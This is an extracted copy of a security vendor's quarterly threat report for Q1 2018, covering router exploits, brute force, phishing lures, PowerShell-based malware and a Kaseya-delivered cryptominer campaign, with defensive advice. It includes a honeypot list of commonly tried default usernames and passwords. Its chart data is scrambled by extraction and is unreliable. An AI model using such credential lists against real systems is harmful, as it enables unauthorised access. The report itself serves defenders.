Post on 02-Oct-2018
QUARTERLY THREATREPORT
Produced by eSentire Threat Intelligence
T H R E A T I N T E L L I G E N C E
E SE N T I R E
Q1 2018
Q1
2QUARTERLY THREAT REPORT Q1 2018
T H R E A T I N T E L L I G E N C EE SE N T I R E
T H R E A T I N T E L L I G E N C E
E SE N T I R E
2
CONTENTSPREFACE
EXECUTIVE SUMMARY
MOST VULNERABLE INDUSTRIES
THREAT TYPES OBSERVED
THREATS AT THE PERIMETER
THREATS BEYOND THE PERIMETER
TAKEAWAYS AND RECOMMENDATIONS
METHODOLOGY
ATTACHMENTS
3
4
5
6
7
9
12
14
15
3QUARTERLY THREAT REPORT Q1 2018
PREFACE
eSentire invented a highly integrated technology stack that enables unparalleled visibility into our mid-market customer networks, and agile real-time threat response capabilities. This report provides a quarterly snapshot, analyzing all events investigated by the eSentire SOC, while addressing three topics: threat types, threat volume and attack types. Each topic is divided into multiple sections, including visual data analysis, written analytical analysis, practical recommendations and key assumptions
4QUARTERLY THREAT REPORT Q1 2018
This quarter saw a dramatic increase in attacks targeting consumer-grade routers, increasing 539% from Q4, 2017.The majority of hostile detections on the eSentire threat detection surface pertain to perimeter threats: Information Gathering, Intrusion Attempts, and Reputation Blocks. eSentire Threat Intelligence assesses with medium confidence that these detections originate, largely, from automated scanning and exploitation attempts. Threats beyond the perimeter, such as Malicious Code (+35%) and Phishing (+39%) both saw increases in the first quarter of 2018.
Education, Construction, and Biotechnology were among those verticals that experienced the highest amount of traffic, due to a high degree of consumer-grade router exploit attempts, brute forcing, and web server exploit attempts. This high threat volume likely indicates an over-exposed threat surface in these industries.
Data from esENDPOINT customers showed heavy use of legitimate Microsoft binaries such as PowerShell and MSHTA. These are popular tools for downloading and executing malicious code in the initial stages of a malware infection. PowerShell can also be leveraged by adversaries to reduce their on-disk footprint and evade detective controls by operating in memory and obfuscating command-line parameters. In January 2018, an unknown adversary was observed leveraging managed service providers and legitimate cloud services to access and deploy CryptoMining software in a campaign impacting multiple eSentire customers. The use of trusted service providers and cloud services were used to successfully evade detection at the network layer, however, the malicious activity was identified via anomaly detection at the endpoint layer.
EXECUTIVE SUMMARYT H R E A T I N T E L L I G E N C E
E SE N T I R E
5QUARTERLY THREAT REPORT Q1 2018
MOST VULNER ABLE INDUSTRIES
In the period from January 1 to March 31 this year, eSentire observed 830,000 potentially hostile events that resulted in 38,000 alerts sent to clients. After normalization by sensor count (see Methodology section) the top five affected industries included Education, Retail, Biotechnology, Construction, and Nonprofit Organizations (Figure 1).
T H R E A T I N T E L L I G E N C E
E SE N T I R E
Educational organizations on eSentire’s threat detection surface experienced a flurry of exploitation attempts in the first quarter. The majority of these detections were attributed to exploit attempts targeting consumer-grade routers. This does not indicate, with certainty, that vulnerable routers are present on the organization’s network. Rather, it suggests a higher exposure to automated opportunistic attacks among educational organizations on eSentire’s detection surface. Trending in router exploitations was first observed in late 2017, when the Reaper Botnet was gaining media attention. Router exploitation attempts continued to be observed through Q1 of 2018, with a 539% increase in observations from Q4 2017 to Q1 2018. Biotechnology experienced a wave of SSH Brute Force attempts as well as a variety of exploit attempts. Most of the vulnerabilities targeted by these exploits were dated between 2013 and 2016. For example, HeartBleed – a four-year-old vulnerability – is still being observed in the wild. Nonprofit organizations experienced several waves of traffic attempting to exploit the HeartBleed OpenSSL vulnerability. Retail organizations experienced a large degree of exploit attempts across different technologies with a focus on web servers. Many attacks targeted PHP or web server vulnerabilities. Construction organizations experienced similar exploit attempts against publicly facing web servers, as well as a variety of scanning activity and SSH brute force attempts.
The prevalence of brute force attacks and outdated exploit attempts implies that a high degree of automated, low-capability threats populate hostile internet traffic. These opportunistic threats are numerous, but rarely successful. Their low success rate is likely justified by their low operational cost.
Malicious Code incidents continue to favor email as a delivery vector, and PowerShell continues to be a popular tool for both opportunistic and targeted attacks. Data from esENDPOINT customers showed PowerShell usage was prevalent in confirmed Malicious Code incidents during the first quarter of 2018 (see Threats Beyond the Perimeter).
Figure 1: Top 5 Industries experiencing verified hostile traffic.
Education
RetailBiotechnologyNonprofitConstruction
6QUARTERLY THREAT REPORT Q1 2018
THREAT TYPES OBSERVED
The majority of traffic observed on eSentire’s threat detections surface (Figure 2) consists of Information Gathering (scans) and Intrusion Attempts (including both bruteforce and exploit attempts).
T H R E A T I N T E L L I G E N C E
E SE N T I R E
This traffic, along with the majority of reputation blocks, are often the result of automated and opportunistic attacks that are constantly scanning public IP ranges for vulnerable software, including OpenSSL, Apache Struts, and Drupal. Reputation Blocks are the result of eSentire blocking traffic from known hostile IP addresses. Information about known hostile IPs is acquired from both internal observations of attacks and intelligence acquired from external partners. Often, these threats are related to Information Gathering or Intrusion Attempts, but can include malware distribution and command and control infrastructure (Malicious Code).
Any software executed on an endpoint that is used for malicious purposes can be classified as Malicious Code. This can often include banking trojans, RATs, CryptoMiners, and ransomware. Phishing attacks represent a lower volume of potentially hostile traffic compared to all other threat types. However, phishing attacks have a fairly consistent success rate (Figure 8) and can often lead to complete compromise of a network, if not addressed immediately.
Over the New Year, Intrusion Attempts grew 36% (Figure 3), due largely to exploitation of a DNS manipulation vulnerability in consumer-grade routers. These manipulations can allow attackers to redirect victims to malicious infrastructure to achieve a variety of results, including malware and phishing landing pages. Other exploits focused on consumer-grade routers.
Successful phishing attacks rose from 102 in Q4 2017 to 130 in Q1 2018 (Figure 8 ). A spike in Malicious Code events for the quarter resulted from activity generated by malicious documents, Kovter and the Android Batmob.b AdWare. Information Gathering dropped over the New Year due to a dramatic decline in SSH scans.
Figure 2: Distributing of threat types seen in potentially hostile traffic.
Figure 3: Quarter over quarter change in threat type volume.
Information Gathering Phishing1.85%
Reputation Block Malicious Code
Intrusion Attempt44.17%
25.41%
23.10%
5.46%
% Change
Threat Type 2017 Q4 2018 Q1
39%36%35%
3%1%
-24%UnclassifiedInformation Gathering
Phishing 10.0K 14.0K242.4K 328.9K30.0K 40.6K
162.1K 166.7K3.4K 3.4K
169.4K 128.8K
Reputation BlockMalicious CodeIntrusion Attempt
7QUARTERLY THREAT REPORT Q1 2018
THREATS AT THE PERIMETER
The majority of perimeter threats on eSentire’s detection surface originated from Intrusion Attempts (Figure 4) which were made up, largely, of exploit attempts and bruteforce attacks. The majority of exploit attempts targeted common web application software, while the majority of brute force targeted remote access protocols, with SSH being the most popular target.
Exploit Attempts: Maintaining a consistent trend, Apache Struts continues to top the list with tens of thousands of exploit attempts detected for the quarter (Figure 5). At only thousands of attempts, targets like Oracle WebLogic, Bash and Ruby were also common. Shellshock, a Bash vulnerability, is another example of an outdated vulnerability that continued to see exploit attempts through Q1. Outdated, opportunistic attacks are rampant in the wild, waiting to be unleashed when security updates are delayed or out-of-date systems are exposed to the internet.
Figure 4: Attacks on the perimeter for the first quarter of 2018.
Figure 5: Most targeted software in Q1 of 2018 (Note: axis is logarithmic).
T H R E A T I N T E L L I G E N C E
E SE N T I R E
Software
1
Jan 7, 180K
20K
40K
60K
100
Feb 4, 18
10
Jan 21, 18
1,000
Feb 18, 18
10,000
Mar 4, 18 Mar 18, 18
DrupalIIS
SIPApache Tomcat
Nginx
Apache Struts
RubyWebLogic Server
Bash
Detections
Perim
eter
Thr
eats
Intrusion Attempt
Information Gathering
Reputation Block
8QUARTERLY THREAT REPORT Q1 2018
Scanning Tools: The most popular tools in the first quarter were the MuieBlackCat and ZmEu Scanners (Table 1), both of which attempt to find vulnerabilities in php-based web servers. OpenVAS and NMAP scanners were also popular tools, typically favored during the reconnaissance phase of an incident or campaign.
Brute Force Targets: When it comes to brute force attacks, SSH and Remote Desktop Protocol (RDP) are favored with some attempts on HTTP. FTP servers also saw a modest degree of attempts in Q1 (Table 2).
Top 10 SSH Brute Force Attempts: eSentire’s ThreatLab logs thousands of SSH brute force attacks per day, collecting information about login attempts, including username, password, and country of origin (Figure 6). Default usernames like ‘root’, ‘admin’, and ‘support’ and similarly basic passwords (including a blank or Null password) were popular. The majority of brute force attacks originated from infrastructure based in China, followed by the United States, Germany, and Russia.
Table 1: Most popular tools for Information Gathering
Table 2: Most popular protocols for Brute Force attacks.
Figure 6: Attempted credentials and source country of attacks on the eSentire honeypot.
T H R E A T I N T E L L I G E N C E
E SE N T I R E
Scanning Tools
Protocol
1
1
1,000
1,000 1,500 2,000
500
500
NMAP Scripting EngineMasscan
SSH
SIPVicious Scanner (VoIP)
RDP
Muhstik
HTTP
Nessus Scanner
Telnet
Jorgee Scanner
FTP
ZmEu Scanner
NMAP ScannerOpenVAS Scanner
Muieblackcat Scanner
Number of Records
Number of Records
Top 10 Usernames Top 10 Passwords Top 10 Countries
0M 0K 0K4M 400K 400K6M2M 200K 200K
Null admin BRguest password INuser 123456 GR
Administrator 12345 MOsupport user TW
supervisor 7ujMko0admin VN
root Null CN
shell\x00 1234 RUenable\x00 sh\x00 DE
admin system\x00 US
Count Count Count
9QUARTERLY THREAT REPORT Q1 2018
THREATS BEYOND THE PERIMETER
A fraction of investigations into events inside the perimeter result in alerts on endpoint threats (Figure 7).
Threats that make it beyond the perimeter of an organization’s network can be costly, exposing data and critical business infrastructure. Malicious Code can arise from downloading and opening malicious documents, either from email or a web browser, but they can also be injected without user awareness following a successful exploit or intrusion. Organizations can also become compromised if the credentials of employees are accidentally shared with an attacker’s deceptive login page. Depending on the privileges allowed for the compromised user, a successful phishing attack could give an attacker considerable power over an organization’s infrastructure and data.
Figure 7: Attacks that have made it past the perimeter in the first quarter of 2018.
T H R E A T I N T E L L I G E N C E
E SE N T I R E
Jan 7, 180K
400
200
600
800
Feb 4, 18Jan 21, 18 Feb 18, 18 Mar 4, 18 Mar 18, 18
Endp
oint
Thr
eats Phishing
Malicious Code
Perimeter attacks observed on eSentire’s threat detection surface suggest a high degree of low-effort, automated attacks targeting misconfigured software exposed to the public internet. While these attacks are rarely successful, the volume of attacks ensures that exposed, vulnerable systems will be quickly scanned and exploited. There are still a significant volume of attackers using more recent vulnerabilities, such as Apache Struts CVE-2017-5638, or the numerous PHP vulnerabilities, but they represent a smaller volume of overall attacks. Similarly, the majority of brute force attacks appear to be targeting default credentials left on devices that have been connected to the internet.
Opportunistic attacks at the perimeter seek out, and attempt to exploit, known vulnerabilities and weak configurations in externally facing services. Beyond the perimeter, the volume of threats originating from client endpoints is far smaller and includes Malicious Code and Phishing.
10QUARTERLY THREAT REPORT Q1 2018
Phishing Lures: The most popular phishing lures used in Q1 of 2018 were DocuSign, Office 365, and OneDrive. Despite DocuSign being the most popular lure used overall (Figure 8, left), Office 365 had the best success rate, jumping to nearly five times that of the previous quarter (Figure 8, right).
Endpoint Threats: Across esENDPOINT customers, the most commonly detected threat in Q1 2018 was the execution of Malicious Code at 93% (Figure 9), followed by Active Intrusions (5%). Active Intrusions often involve an attacker interacting with the victim’s system through a shell initiated via a myriad of techniques, many of which overlap with Malicious Code. 91% of critical incidents detected via esENDPOINT involved known, legitimate binaries such as PowerShell or MSHTA. These processes are used by opportunistic and targeted threats alike, allowing them to circumvent basic controls to deliver and install malware.
Figure 9: Endpoint threats observed on eSentire’s detection surface.
T H R E A T I N T E L L I G E N C E
E SE N T I R E
Exploit Kit
Active Intrusion
Malicious Code93.21%
5.41%
1.35%
Figure 8: left: most popular phishing lures, right: change in successful phishing attacks from quarter to quarter
Phishing Success Rate
StatusFailSuccess
0 40 6020
Adobe
Apple
PayPal
TechSupport
DocuSign
Dropbox
OneDrive
Office 365
2018 Q1 MoM
0% 200%
Lure Used 2017 Q4 2018 Q1
Verizon
Adobe
Yahoo
Office 365
4
1
19
1
1
2
3
1
3
6
8
2
3
3
4
0
3
1
4
0
1
1
1
0
Chase
DocuSign
Dropbox
Apple
OneDrive
11QUARTERLY THREAT REPORT Q1 2018
Malicious Code: Incidents observed across esENDPOINT customers involved CryptoMiners (45%), Banking Trojans (32%) and, to a lesser extent, Credential Stealers (13%) and Ransomware (3%). At least 21% of Malicious Code incidents originated from Malicious Word documents.
Opportunistic actors continue to leverage PowerShell to retrieve and execute malicious code from remote sources. PowerShell was a popular execution technique among Malicious Code incidents in Q1. Mainstream endpoint detection and response solutions enjoy widespread coverage of these execution techniques, meaning adversaries may become motivated to modify their tactics in the future. Several Malicious Code incidents were observed in Q1 employing obfuscated PowerShell commands to impede analysis. These techniques are not new, but make up a significant portion of endpoint detections with 13% of observed incidents involving obfuscated command-line parameters. Analysts are often able to make inferences by examining PowerShell actions following execution of obfuscated commands. In addition to command-line obfuscation techniques, use of Managed Service Providers (MSP) for initial access and trusted cloud services for malware staging were also observed. In late January, an unknown adversary leveraged a flaw in Kaseya’s Virtual System Administrator (VSA) product to deploy CryptoMiners across a handful of eSentire clients. This attack leveraged trusted systems throughout its lifecycle, relying on Kaseya VSA endpoint agents for initial access via MSPs and trusted cloud platforms for delivery of malicious scripts. The result was a CryptoMiner which operated in memory with multiple persistence mechanisms. Leveraging trusted IT and Cloud systems ensured this attack went largely unnoticed by traditional detective controls. The threat was identified by esENDPOINT via process behavior monitoring. Kaseya was notified of the intrusions, resulting in multiple security fixes.
Figure 10: Types of Malicious Code events detected on endpoints.
T H R E A T I N T E L L I G E N C E
E SE N T I R E
Credential Stealer Ransomware3.23%
Banking Trojan HTA JavaScript Downloader
CryptoMiner45.16%
32.26%
12.90%
6.45%
12QUARTERLY THREAT REPORT Q1 2018
There are several actions that when taken, can protect business networks from compromise.
Protect against vulnerability exploit
While successful exploitation of older vulnerabilities is uncommon, the prevalence of opportunistic intrusion attempts in the wild means that administrators should be mindful when exposing systems to untrusted networks. Devices should be checked often to ensure they’re hardened with secure hardware and software configurations.
Protect against router compromise
• Confirm that network infrastructure devices are properly configured and up to date with security patches
• Ensure all default passwords for network infrastructure devices have been changed• Limit access to management interfaces
Revisit organizational awareness training programs to protect against phishing
Employees become the last line of defense when email filtering or malware detection systems fail to block phishing attacks. User education and security encouragement are primary factors in the prevention of successful phishing attacks. It is advised that user education programs be tested regularly to validate their effectiveness.
TAKEAWAYS AND RECOMMENDATIONS
T H R E A T I N T E L L I G E N C E
E SE N T I R E
13QUARTERLY THREAT REPORT Q1 2018
Protect against opportunistic threats like PowerShell-based attacks
Follow these 6 key steps to guard against covert attacks like PowerShell:
Log PowerShell activity across the network• Enable the logging function via Group Policy• Centralize and compare logs against known attack method signatures. Gaining
visibility into network connections established by PowerShell processes is a simple, yet highly effective method for detecting modern malware
Block Word document macrosAverage users do not need to execute Word document macros received in their email inbox. Blocking macros reduces the overall attack surface.
Enforce user educationMalware attacks often require user interaction in the initial phases of infection. As such, educating staff about ongoing threats is an important step in preventing successful attacks.
Restrict privilegesSome scripts require administrative privilege to run therefore, restricting user privileges based on user requirements reduces the potential impact of compromise.
Implement application whitelistingApplication whitelisting is an effective control for preventing unapproved software from being executed. It involves maintaining an active list of approved software which can generate additional overhead, meaning it may not be a cost-effective solution for some organizations.
Maintain up-to-date antivirus defensesMaintaining up-to-date antivirus programs that contain the latest heuristics and signature-based rules can assist in detecting the latest threats. Other endpoint solutions can be employed and include EDR, HIDS, and NextGen antivirus.
T H R E A T I N T E L L I G E N C E
E SE N T I R E
1 |
4 |
5 |
6 |
2 |
3 |
14QUARTERLY THREAT REPORT Q1 2018
Industry Comparisons are made using data normalized by sensor count. Sensor count serves as a measure of company size. It follows that the sum of sensors for all companies in an industry approximates the scope of coverage for each industry. Normalizing the number of events in each industry by this number, then, gives an impression of attack intensity per area of detection surface.
Threats at the Perimeter: A time series representation of the volume of all detections originating from scans (Information Gathering), Intrusion Attempts, and Reputation Blocks, regardless of whether the detection merited an alert to the client
Threats Beyond the Perimeter: A time-series representation of the volume of alerts sent on Malicious Code and Phishing events was generated from known hostile threats, as indicated by SOC’s notes on investigation conclusions. Software targeted and exploit tools used are based on meta-data associated with detections.
Phishing Lures are recorded in a case management system as phishing incidents are observed on eSentire’s threat detection surface. The SOC maintains a record of whether phishing credentials were submitted or not, allowing differentiation between successful and failed attempts.
Endpoint Detection data was interpreted from impartial records for which broader context was not available due to retention limits. This accounted for approximately half of Malicious Code detections, which were removed from the data set for Figure 10. The other half was categorized based on event metadata and analyst notes.
METHODOLOGYT H R E A T I N T E L L I G E N C E
E SE N T I R E
15QUARTERLY THREAT REPORT Q1 2018
Attachment 1: Threat Signals Normalization Taxonomy (based on the eCSIRT.net taxonomy)
Threat Signals Type Normalization Schema
Threat Type Sub Type Description/Examples
Malicious Code
Virus
Any malicious software that is intentionally included or inserted in a system for a harmful purpose. A user interaction is normally necessary to activate the code.
Worm
Trojan
Spyware
Ransomware
Rootkit
...
Information Gathering
Scanning
Attacks that send requests to a system to discover weak points. This also includes some kinds of testing processes to gather information about hosts, services and accounts. Examples: fingerd, DNS querying, ICMP, SMTP (EXPN, RCPT, …).
Sniffing Observing and recording network traffic (wiretapping).
Social Engineering Gathering information from a human being in a non-technical way (eg, lies, tricks, bribes, or threats).
Intrusion Attempts
Exploiting known vulnerabilities
An attempt to compromise a system or to disrupt any service by exploiting vulnerabilities with a standardised identifier such as CVE name (eg, buffer overflow, backdoors, cross side scripting, etc).
Login attempts Multiple login attempts (guessing / cracking of passwords, brute force).
New attack signature A network intrusion attempt using an unknown exploit.
Availability
DDoS By this kind of an attack a system is bombarded with so many packets that the operations are delayed or the system crashes. DoS examples are ICMP and SYN floods, Teardrop attacks and mail-bombing. DDoS often is based on DoS attacks originating from botnets, but also other scenarios exist like DNS Amplification attacks.
However, the availability also can be affected by local actions (destruction, disruption of power supply, etc.) or by spontaneous failures or human error, without malice or gross neglect being involved.
DoS
Sabotage
Outage (no malice)
Fraud
Unauthorized use ofresources
Using resources for unauthorized purposes including profit-making ventures (eg, the use of e-mail to participate in illegal profit chain letters or pyramid schemes).
Copyright Selling or installing copies of unlicensed commercial software or other copyright protected materials (Warez).
Masquerade Types of attacks in which one entity illegitimately assumes the identity of another in order to benefit from it.
Phishing Masquerading as another entity in order to persuade the user to reveal a private credential.
AT TACHMENTST H R E A T I N T E L L I G E N C E
E SE N T I R E
16QUARTERLY THREAT REPORT Q1 2018
T H R E A T I N T E L L I G E N C E
E SE N T I R E
Threat Signals Type Normalization Schema
Threat Type Sub Type Description/Examples
Unclassified
All incidents whichdo not fit in one ofthe given categoriesshould be put into this class.
If the number of incidents in this category increases, it is an indicator that the classification scheme must be revised.
Policy Violation
UnauthorizedApplications• Skype• P2P• SMTP• FTP• ...
Any incident resulting from violation of an organization’s acceptable usage policies by an authorized user.
Remote Access• SSH• LogMeln• RDP• TeamViewer• ...
Proxy/Tunnel• Proxy• TOR• ...
ReputationBlock Known bad indicator Block/ detection based on known bad indicator, but without other
validation or attribution to other incidents types.
Source: https://www.enisa.europa.eu/topics/csirt-cert-services/community-projects/existing-taxonomies
Attachment 2: Confidence Language Used
Confidence language expresses the analyst’s judgment on the probability, or likelihood that a certain event will occur under defined circumstances and considering the cumulative quality of information that supports an assessment.
• Certainly: 100% or (10/10) chances that a certain event will occur under defined circumstances.
• Highly Probable: 93%+-6% or (8/10) chances that a certain event will occur under defined circumstances.
• Probable: 75% or (7/10) chances that a certain event will occur under defined circumstances.
• Plausible: 50% or (5/10). Chances are even.
• Probably not: 30% +-10% or (3/10) that a certain event will occur under defined circumstances.
• Almost Certainly not: 7%+-5% or (1/10) that a certain event will occur under defined circumstances.
17QUARTERLY THREAT REPORT Q1 2018
eSentire is the largest pure-play Managed Detection and Response (MDR) service provider, keeping organizations safe from constantly evolving cyber-attacks that technology alone cannot prevent. Its 24x7 Security Operations Center (SOC), staffed by elite security analysts, hunts, investigates, and responds in real-time to known and unknown threats before they become business-disrupting events. Protecting more than $6 trillion in corporate assets, eSentire absorbs the complexity of cybersecurity, delivering enterprise-grade protection and the ability to comply with growing regulatory requirements. For more information, visit www.eSentire.com and follow @eSentire.